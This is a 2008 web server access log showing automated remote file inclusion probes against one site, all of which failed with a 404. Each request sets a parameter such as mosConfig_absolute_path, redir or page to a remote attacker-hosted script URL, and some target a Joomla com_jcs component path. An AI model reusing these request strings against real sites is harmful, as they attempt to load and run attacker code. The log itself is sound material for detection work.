67.19.192.212 - - [08/Feb/2008:06:54:37 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:06:54:37 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:06:54:37 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:06:55:16 -0800] "GET /logs/access_080121.log/index.php?redir=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:06:55:24 -0800] "GET /logs/index.php?redir=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.26.184.3 - - [08/Feb/2008:06:55:41 -0800] "GET /logs/access_080117.log/index.php?page=http://64.38.52.250/~sexypimp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.184.3 - - [08/Feb/2008:06:55:41 -0800] "GET /index.php?page=http://64.38.52.250/~sexypimp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.184.3 - - [08/Feb/2008:06:55:41 -0800] "GET /logs/index.php?page=http://64.38.52.250/~sexypimp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
